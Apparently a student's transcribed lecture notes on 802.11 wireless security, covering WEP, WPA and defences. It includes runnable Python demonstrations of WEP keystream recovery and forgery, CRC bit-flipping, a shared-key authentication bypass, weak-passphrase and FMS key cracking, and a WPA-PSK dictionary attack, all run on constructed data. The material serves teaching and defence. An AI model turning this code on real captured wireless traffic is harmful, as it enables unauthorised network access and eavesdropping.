~802.11n was due for November 2006 at the time of this lecture (it was finally ratified in 2009)
•Aiming for maximum 200Mbps with average 100Mbps
Open System Authentication
~Service Set Identifier (SSID)
~Station must specify SSID to Access Point when requesting association.
~Multiple APs with same SSID form Extended Service Set.
~APs can broadcast their SSID.
~Some clients accept "*" (any) as the SSID.
•They then associate with the strongest AP regardless of its SSID.
MAC ACLs and SSID hiding
~Access points have Access Control Lists (ACL).
~ACL is a list of allowed MAC addresses.
•E.g. Allow access to:
~But MAC addresses are sniffable and spoofable: an attacker copies an allowed address out of captured frames.
~AP beacons without SSID ("hidden" SSID)
*Attacker sends deauthenticate frames to a client
*SSID is then displayed in the clear when the client re-associates (probe/association request)
•Wireless LAN uses a radio signal.
•Not limited to the physical building.
•Signal is weakened by:
•A directional antenna allows interception over longer distances.
•A directional antenna provides focused reception.
802.11 Wireless LAN
~Three basic security services defined by IEEE for the WLAN environment
*Authentication: a security service to verify the identity of a communicating client
*Integrity: to ensure that messages are not modified in transit between the wireless
clients and the access point in an active attack
*Confidentiality: to provide the "privacy achieved by a wired network"
802.11b Security Services
~Two security services provided:
*Shared Key Authentication
*Wired Equivalent Privacy (WEP)
Wired Equivalent Privacy
~Shared key between
•An Access Point and all the stations that use it.
~Extended Service Set
•All Access Points will have the same shared key.
~No key management
•Shared key entered manually into every access point and every client.
*Key management nightmare in large wireless LANs
~RC4 (Rivest Cipher 4, also read as "Ron's Code number 4")
•Symmetric key stream cipher
•RSA Security Inc.
•Designed in 1987.
•Trade secret until it leaked in 1994.
~RC4 accepts key sizes from 1 to 256 bytes (8 to 2048 bits).
~RC4 generates a stream of pseudo random bytes
•XORed with plaintext to create ciphertext (and with ciphertext to recover plaintext).
WEP – Sending
~Compute Integrity Check Value (ICV).
•32 bit Cyclic Redundancy Check (CRC-32) of the message.
•Appended to message to create plaintext.
~Plaintext encrypted via RC4
•Plaintext XORed with long key stream of pseudo random bits.
•Key stream is a function of (the RC4 key is IV || secret key)
~40-bit secret key
~24 bit initialisation vector (IV), chosen per frame
~Ciphertext is transmitted, with the IV in the clear in front of it.
WEP – Receiving
~Ciphertext is received.
~Ciphertext decrypted via RC4
•Ciphertext XORed with long key stream of pseudo random bits.
•Key stream is a function of
~40-bit secret key
~24 bit initialisation vector (IV), read from the received frame
•Separate ICV from message.
•Compute ICV for message
•Compare with received ICV; drop the frame on mismatch.
Shared Key Authentication
~When station requests association with Access Point
•AP sends random number (challenge) to station, in the clear
•Station encrypts random number
•Uses RC4, 40 bit shared secret key & 24 bit IV
•Encrypted random number sent to AP
•AP decrypts received message
•Uses RC4, 40 bit shared secret key & the 24 bit IV the station chose
•AP compares decrypted random number to transmitted random number
~If numbers match, station has shared secret key.
~But an eavesdropper now holds a plaintext/ciphertext pair, i.e. the keystream for that IV.
~Shared secret key required for:
•Associating with an access point.
~Messages are encrypted.
~Messages have checksum.
~But management traffic still broadcast in clear containing SSID.
~IV must be different for every message transmitted.
~802.11 standard doesn’t specify how IV is calculated.
~Wireless cards use several methods
•Some use a simple ascending counter for each message.
•Some switch between alternate ascending and descending counters.
•Some use a pseudo random IV generator.
Passive WEP attack
~If the 24 bit IV is an ascending counter and the Access Point transmits at 11 Mbps,
~all 2^24 IVs are exhausted in roughly 5 hours, after which IVs (and keystreams) repeat.
•Attacker collects all traffic
•Attacker can then find two messages:
*Encrypted with same key and same IV
*XOR of the two ciphertexts = XOR of the two plaintexts; statistical attacks reveal the plaintext
*Plaintext XOR Ciphertext = Keystream, which decrypts every other frame sent with that IV
Active WEP attack
~If attacker knows a plaintext and ciphertext pair
•Keystream for that IV is known.
•Attacker can create correctly encrypted messages (reusing that IV).
•Access Point is deceived into accepting messages.
~Even without the keystream:
•Flip a bit in the ciphertext
•The matching change to the CRC-32 can be computed (CRC is linear), so the ICV still verifies
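The WEP sending and receiving steps, the shared key authentication exchange and the passive and active attacks above, worked through as an added Python example (this is not code from the slides or from any vendor). The 40-bit key, the IV, the SNAP-headed message and the two 128-byte challenges are constructed; the authentication frames are simplified to "challenge" and "RC4-encrypted challenge" so that the flaw is visible, and the 0xAA SNAP bytes play the role of the known plaintext an attacker would really rely on.

```python
import struct
import zlib
from typing import Optional


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream of `length` bytes for `key`: key scheduling, then output generation."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # KSA: permute S under the key
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    while len(out) < length:                   # PRGA: one keystream byte per step
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(msg: bytes) -> bytes:
    """Integrity Check Value: CRC-32 of the message, appended little-endian."""
    return struct.pack("<I", zlib.crc32(msg) & 0xFFFFFFFF)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret: bytes, iv: bytes, msg: bytes) -> bytes:
    """Sender: plaintext = msg || ICV, XORed with RC4(iv || secret); the IV travels in the clear."""
    plaintext = msg + icv(msg)
    return iv + xor(plaintext, rc4(iv + secret, len(plaintext)))


def wep_decrypt(secret: bytes, frame: bytes) -> Optional[bytes]:
    """Receiver: read the IV, regenerate the keystream, split off and verify the ICV."""
    iv, body = frame[:3], frame[3:]
    plaintext = xor(body, rc4(iv + secret, len(body)))
    msg, tag = plaintext[:-4], plaintext[-4:]
    return msg if icv(msg) == tag else None     # None models a dropped frame


def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    """Passive attack: ciphertext XOR known plaintext = keystream for this frame's IV."""
    return xor(frame[3:], known_plaintext + icv(known_plaintext))


def forge(iv: bytes, keystream: bytes, msg: bytes) -> bytes:
    """Active attack: build a valid frame for `iv` from a recovered keystream, no key needed."""
    plaintext = msg + icv(msg)
    if len(plaintext) > len(keystream):
        raise ValueError("recovered keystream too short for this message")
    return iv + xor(plaintext, keystream)


def bit_flip(frame: bytes, delta: bytes) -> bytes:
    """Active attack: XOR `delta` into the encrypted message and fix up the encrypted ICV.
    CRC-32 is affine over GF(2): crc(m ^ d) = crc(m) ^ crc(d) ^ crc(0...0), so the ICV
    correction depends only on `delta`, never on the plaintext or the key."""
    iv, body = frame[:3], frame[3:]
    if len(delta) != len(body) - 4:
        raise ValueError("delta must cover exactly the message bytes")
    zeros = bytes(len(delta))
    icv_fix = struct.pack("<I", (zlib.crc32(delta) ^ zlib.crc32(zeros)) & 0xFFFFFFFF)
    return iv + xor(body, delta + icv_fix)


# Constructed sample data (not from the slides): a 40-bit key, one IV, a SNAP-headed frame.
SECRET = bytes.fromhex("0badc0ffee")
IV = bytes.fromhex("5a5a01")
SNAP = b"\xaa\xaa\x03\x00\x00\x00\x08\x00"          # LLC/SNAP header + EtherType IPv4
MSG = SNAP + b"ALLOW user=guest"
CHALLENGE_1 = bytes(range(128))                    # AP challenge the attacker overhears
CHALLENGE_2 = bytes(reversed(range(128)))          # later challenge the attacker must answer


def shared_key_bypass() -> bool:
    """Observe one legitimate authentication, then authenticate with the keystream alone."""
    response = wep_encrypt(SECRET, IV, CHALLENGE_1)           # legitimate station answers
    ks = recover_keystream(response, CHALLENGE_1)             # 132 bytes of keystream for IV
    reply = forge(IV, ks, CHALLENGE_2)                        # attacker answers a new challenge
    return wep_decrypt(SECRET, reply) == CHALLENGE_2          # the AP accepts it


def flip_guest_to_admin() -> Optional[bytes]:
    """Modify an encrypted frame without the key; the receiver's ICV check still passes."""
    frame = wep_encrypt(SECRET, IV, MSG)
    delta = xor(MSG, MSG.replace(b"guest", b"admin"))          # zero except where bytes change
    return wep_decrypt(SECRET, bit_flip(frame, delta))


if __name__ == "__main__":
    print(wep_decrypt(SECRET, wep_encrypt(SECRET, IV, MSG)) == MSG)
    print(shared_key_bypass())
    print(flip_guest_to_admin())
```

Note that neither attack touches RC4 itself: reusing an IV hands the attacker the keystream, and the CRC fix-up works because a checksum is not a message authentication code.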
Limited WEP keys
~Some vendors allow limited WEP keys
•User types in a passphrase
•WEP key is generated from the passphrase
•The passphrase creates only 21 bits of entropy in the 40 bit key.
~Reduces key strength to 21 bits = 2,097,152 candidate keys
~The remaining 19 bits are determined by those 21.
~A 21 bit key can be brute forced in minutes.
Creating limited WEP keys
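An added example (not from the slides) of how such a limited key is generated and why only 21 bits matter. It assumes the generator is the one analysed publicly by Tim Newsham (the Neesus Datacom passphrase algorithm adopted by several vendors): the ASCII passphrase is XOR-folded into a 32-bit seed, a linear congruential generator with the constants below is stepped once per key byte, and bits 16..23 of each state become a key byte. The constants and layout are reconstructed from that analysis and are an assumption; the passphrases are constructed. Two passphrases that differ only in their fourth character producing identical keys is the visible consequence.

```python
# LCG constants of the generator (reconstructed from public analyses; an assumption, see lead-in)
LCG_A, LCG_C, MASK32 = 0x343FD, 0x269EC3, 0xFFFFFFFF
EFFECTIVE = 0x7F7F7F    # seed bits that can influence the keys: low 24, minus 3 ASCII high bits


def passphrase_seed(passphrase: str) -> int:
    """Fold the ASCII passphrase into a 32-bit seed: byte i is XORed into seed byte i mod 4."""
    seed = 0
    for i, ch in enumerate(passphrase.encode("ascii")):
        seed ^= ch << ((i & 3) * 8)
    return seed


def keys_from_seed(seed: int, nkeys: int = 4, keylen: int = 5) -> list:
    """Step the LCG once per key byte and take bits 16..23 of the state."""
    state, out = seed, bytearray()
    for _ in range(nkeys * keylen):
        state = (state * LCG_A + LCG_C) & MASK32
        out.append((state >> 16) & 0xFF)
    return [bytes(out[k * keylen:(k + 1) * keylen]) for k in range(nkeys)]


def wep_keys_from_passphrase(passphrase: str) -> list:
    """The vendor-side function: four 40-bit keys from one passphrase."""
    return keys_from_seed(passphrase_seed(passphrase))


def brute_force_key(target: bytes):
    """Recover the effective seed behind a 40-bit key by trying all 2^21 values.
    In an LCG mod 2^32 a state bit depends only on lower-or-equal seed bits, so the key
    bytes (state bits 16..23) depend on seed bits 0..23 only; bits 7, 15 and 23 are the
    high bits of ASCII characters and are always zero. That leaves 21 free bits."""
    for b0 in range(128):
        for b1 in range(128):
            for b2 in range(128):
                seed = b0 | (b1 << 8) | (b2 << 16)
                state = (seed * LCG_A + LCG_C) & MASK32     # cheap first-byte filter
                if (state >> 16) & 0xFF != target[0]:
                    continue
                if keys_from_seed(seed, 1, len(target))[0] == target:
                    return seed
    return None


if __name__ == "__main__":
    keys = wep_keys_from_passphrase("Camp")
    print([k.hex() for k in keys])
    # the 4th character lands in seed bits 24..31, which never reach the key bytes:
    print(wep_keys_from_passphrase("Camp") == wep_keys_from_passphrase("Camq"))
    seed = brute_force_key(keys[0])
    print(hex(seed), keys_from_seed(seed) == keys)
```

Recovering the reduced seed from any one of the four keys regenerates all four, so a single cracked key exposes the whole key set the passphrase produced.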
Brute force key attack
~IV is included in the message, so only the secret key is unknown.
•Search all 2^40 possible secret keys.
•Find which key decrypts ciphertext to plaintext (e.g. yields a valid ICV).
~170 days on a modern laptop
128 bit WEP
~Vendors have extended WEP to 128 bit keys.
•104 bit secret key.
•24 bit IV.
~Brute force takes 10^19 years for 104-bit key.
~Effectively safeguards against brute force attacks.
~WEP exposes part of the PRNG input.
•IV is transmitted with the message.
•Every wireless frame has a reliable first byte
*Sub-network Access Protocol (SNAP) header used in the logical link control layer,
upper sub-layer of the data link layer.
*First byte is 0xAA
*Capture packets with weak IVs (Fluhrer, Mantin and Shamir, 2001)
*First byte ciphertext XOR 0xAA = first byte of key stream
*The key bytes can be determined one at a time from that initial key stream byte
~Practical for 40 bit and 104 bit keys
•WEPCrack: first tool to demonstrate the attack using the IV weakness.
~Open source, Anton Rager.
~Weak IV generator.
~Search sniffer output for weak IVs & record the 1st byte.
~Cracker to combine weak IVs and selected 1st bytes.
•AirSnort: Cypher42, Minnesota, USA.
•Does it all!
•Searches for weak IVs
•Records encrypted data
•Until key is derived.
~100 MB to 1 GB of transmitted data.
~3 to 4 hours on a very busy WLAN.
Avoid the weak IVs
•FMS described a simple method to find weak IVs
~Many manufacturers skip those IVs after 2002
~Therefore AirSnort and others may not work against recent hardware
•However David Hulton aka h1kari
~Properly implemented the FMS attack, which shows many more weak IVs
~Identified IVs that leak into the second byte of the key stream.
~Second byte of the SNAP header is also 0xAA
~So the attack still works on recent hardware
~And is faster on older hardware
~Tools: dwepcrack, weplab, aircrack
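The weak-IV attack described above, as an added Python example that is not from the slides or from any of the tools named. It implements the classic FMS class of IVs (b, 255, x) for one key byte at a time, uses the 0xAA SNAP byte to recover the first keystream byte, and adds the "fudge" depth-first search with key verification that real crackers use to survive noisy votes; h1kari's second-byte extension is not implemented. The 40-bit key is constructed and the "captured" frames are generated locally; the RC4 key scheduling is written out because the attacker's simulation is exactly that schedule, stopped after the key bytes already known.

```python
SNAP_FIRST_BYTE = 0xAA   # every 802.11 data frame's plaintext starts with the LLC/SNAP DSAP


def ksa(key: bytes, steps: int = 256):
    """RC4 key scheduling. With steps < 256 it returns the partial state (S, j) that an
    attacker who knows only the first `steps` key bytes can simulate."""
    S = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def first_keystream_byte(key: bytes) -> int:
    """First PRGA output byte for the full key (iv || secret)."""
    S, _ = ksa(key)
    i, j = 1, S[1]
    S[i], S[j] = S[j], S[i]
    return S[(S[i] + S[j]) & 0xFF]


def capture(secret: bytes):
    """Victim side (constructed traffic): one frame for every classic weak IV (b, 255, x).
    Each sample is (IV in clear, first ciphertext byte = 0xAA XOR first keystream byte)."""
    samples = []
    for b in range(3, 3 + len(secret)):
        for x in range(256):
            iv = bytes([b, 255, x])
            samples.append((iv, first_keystream_byte(iv + secret) ^ SNAP_FIRST_BYTE))
    return samples


def fms_votes(samples, known: bytes):
    """Vote for key byte K[b], b = 3 + len(known), using every IV in the 'resolved' state."""
    b = 3 + len(known)
    votes = [0] * 256
    for iv, c0 in samples:
        z = c0 ^ SNAP_FIRST_BYTE                    # first keystream byte, leaked by SNAP
        S, j = ksa(iv + known, b)                   # simulate the b steps we can
        if S[1] < b and (S[1] + S[S[1]]) & 0xFF == b:
            # If positions 1, S[1] and b survive the remaining steps (~5% chance), the
            # first output is the value swapped into S[b] at step b: z = S[j + S[b] + K[b]].
            votes[(S.index(z) - j - S[b]) & 0xFF] += 1
    return votes


def fms_crack(samples, keylen: int, fudge: int = 3):
    """Depth-first over the `fudge` best-voted candidates per byte; a full key is accepted
    only if it reproduces the first keystream byte of a few captured frames."""
    check = samples[:8]

    def search(prefix: bytes):
        if len(prefix) == keylen:
            ok = all(first_keystream_byte(iv + prefix) ^ SNAP_FIRST_BYTE == c0
                     for iv, c0 in check)
            return prefix if ok else None
        votes = fms_votes(samples, prefix)
        for cand in sorted(range(256), key=lambda c: -votes[c])[:fudge]:
            found = search(prefix + bytes([cand]))
            if found is not None:
                return found
        return None

    return search(b"")


SECRET = bytes.fromhex("1f2a3b4c5d")    # constructed 40-bit key the attacker does not know

if __name__ == "__main__":
    traffic = capture(SECRET)
    print(len(traffic), "frames; recovered:", fms_crack(traffic, 5).hex())
```

Only about one in twenty resolved IVs actually votes for the right byte, which is why the vote table is combined with a bounded search and a verification step rather than trusted outright; a 104-bit key needs the same loop run over thirteen bytes.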
Generating WEP traffic
•Not capturing enough traffic?
~Capture encrypted ARP request packets
~Anecdotally lengths of 68, 118 and 368 bytes appear appropriate
~Replay encrypted ARP packets to generate encrypted ARP replies
~Aireplay implements this.
•Security Policy & Architecture Design
•Treat as untrusted LAN
•Discover unauthorised use
•Access point audits
•Access point location
Security Policy & Architecture
•Define use of wireless network
~What is allowed
~What is not allowed
•Holistic architecture and implementation
~Consider all threats.
~Design entire architecture
•To minimize risk.
Wireless as untrusted LAN
~Treat wireless as untrusted.
•Similar to Internet.
~Firewall between WLAN and Backbone.
~Extra authentication required.
•at WLAN / Backbone junction.
Discover unauthorized use
•Search for unauthorised access points, ad-hoc networks or clients.
~Scan the network for unknown SNMP agents.
~For unknown web or telnet interfaces.
~Sniff 802.11 packets
~Identify IP addresses
~Detect signal strength
~But you may sniff your neighbours…
•Wireless Intrusion Detection
~AirMagnet, AirDefense, Trapeze, Aruba,…
Access point audits
•Review security of access points.
•Are passwords and community strings secure?
•Use Firewalls & router ACLs
~Limit use of access point administration interfaces.
•Standard access point config:
~Community string & password policy
~Protect the station from attackers.
•VPN from station into Intranet
~End-to-end encryption into the trusted network.
~But consider roaming issues.
•Host intrusion detection
~Provide early warning of intrusions onto a station.
~Check that stations are securely configured.
Location of Access Points
•Ideally locate access points
~In centre of buildings.
•Try to avoid access points
~On external walls
~Line of sight to outside
•Use directional antenna to “point” radio signal.
•Wi-Fi Protected Access (WPA)
~Works with 802.11b, a and g
•"Fixes" WEP's problems
•Existing hardware can be used (firmware/driver upgrade)
•802.1x user-level authentication
~RC4 session-based dynamic encryption keys (TKIP)
~Per-packet key derivation
~Unicast and broadcast key management
~New 48 bit IV (sequence counter) with new sequencing method to block replay
~Michael 8 byte message integrity code (MIC)
•Optional AES support to replace RC4
WPA and 802.1x
~802.1x is a general purpose network access control mechanism
~WPA has two modes
•Pre-shared mode, uses pre-shared keys
•Enterprise mode, uses Extensible Authentication Protocol (EAP) with a RADIUS
server making the authentication decision
•EAP is a transport for authentication, not authentication itself
•EAP allows arbitrary authentication methods
•For example, Windows supports
~EAP-TLS requiring client and server certificates
Practical WPA attacks
•Dictionary attack on pre-shared key mode
~The pre-shared key is derived from the passphrase and SSID, and a captured 4-way handshake can be checked offline against each guess
~coWPAtty, Joshua Wright
•Denial of service attack (Michael countermeasures)
~If WPA equipment sees two packets with invalid MICs in 1 second
•All clients are disassociated
•All activity stopped for one minute
•Two malicious packets a minute are enough to stop a wireless network
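The pre-shared key dictionary attack, as an added Python example that is not the slides' or coWPAtty's code but follows the same derivation: PBKDF2 turns passphrase and SSID into the PMK, the 802.11i PRF expands it into the PTK using both MACs and both nonces from the 4-way handshake, and the KCK (first 128 bits of the PTK) keys the HMAC-MD5 MIC on message 2. Everything an attacker would read from a capture (SSID, MACs, nonces, the EAPOL-Key frame and its MIC) is constructed here; the frame layout follows the EAPOL-Key format with the MIC field zeroed, and the wordlist and true passphrase are constructed too.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: bytes, ssid: bytes) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    out, counter = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max MACs || min/max nonces);
    its first 128 bits are the Key Confirmation Key that authenticates the handshake."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)[:16]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA (TKIP, key descriptor version 1) MIC: HMAC-MD5 over the EAPOL-Key frame
    with its MIC field zeroed, truncated to 16 bytes."""
    return hmac.new(kck, frame, hashlib.md5).digest()[:16]


MIC_OFFSET = 81   # EAPOL header (4) + descriptor fields preceding the MIC (77)


def build_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 of the 4-way handshake, MIC field zeroed."""
    return (b"\x01\x03\x00\x5f"        # EAPOL version 1, type Key, body length 95
            + b"\xfe"                  # descriptor type: WPA
            + b"\x01\x09"              # key info: version 1 (RC4/HMAC-MD5), pairwise, MIC present
            + b"\x00\x20"              # key length
            + b"\x00" * 8              # replay counter
            + snonce                   # 32-byte SNonce (one of the values the attacker needs)
            + b"\x00" * 16             # key IV
            + b"\x00" * 8              # key RSC
            + b"\x00" * 8              # key ID
            + b"\x00" * 16             # MIC (zero while computing it)
            + b"\x00\x00")             # key data length


# Constructed capture: SSID, the two MACs, both nonces, and the MIC the station sent.
SSID = b"corp-wlan"
AP_MAC = bytes.fromhex("00112233aabb")
STA_MAC = bytes.fromhex("00aabbccddee")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
MSG2 = build_msg2(SNONCE)
TRUE_PASSPHRASE = b"Summer2006"        # constructed; the attacker does not know it
CAPTURED_MIC = eapol_mic(
    derive_kck(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE),
    MSG2)
WORDLIST = [b"password", b"letmein1", b"wireless", b"Summer2006", b"Winter2006"]


def dictionary_attack(wordlist, ssid=SSID, aa=AP_MAC, spa=STA_MAC,
                      anonce=ANONCE, snonce=SNONCE, msg2=MSG2, captured_mic=CAPTURED_MIC):
    """Offline: derive PMK -> KCK -> MIC per candidate; a matching MIC reveals the passphrase."""
    for word in wordlist:
        kck = derive_kck(pmk_from_passphrase(word, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return word
    return None


if __name__ == "__main__":
    print(dictionary_attack(WORDLIST))
```

The 4096-round PBKDF2 is the only expensive step, and it is salted with the SSID, so precomputed tables only help against common SSIDs; a long random passphrase, or enterprise mode with EAP, is what defeats this attack.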
•WAP is used on small, handheld devices like cell phones for out-of-the-office
•Designers created WTLS (Wireless Transport Layer Security) as a method to ensure
privacy of the data because it was being broadcast
•802.11 does not allow physical control of the transport mechanism
•Transmitting network data wirelessly sends frames to all wireless machines in range,
not just a single client
•Poor authentication. The SSID is broadcast to anyone listening
•Flawed use of the RC4 encryption algorithm (static key, short IV) makes even encrypted
traffic subject to interception and decryption
•WEP is used to encrypt wireless communications in an 802.11 environment and S/MIME
huhuhuuu.. quite a lot of stuff to remember in this lecture.. ermmm.. oh well....
written by Azma Green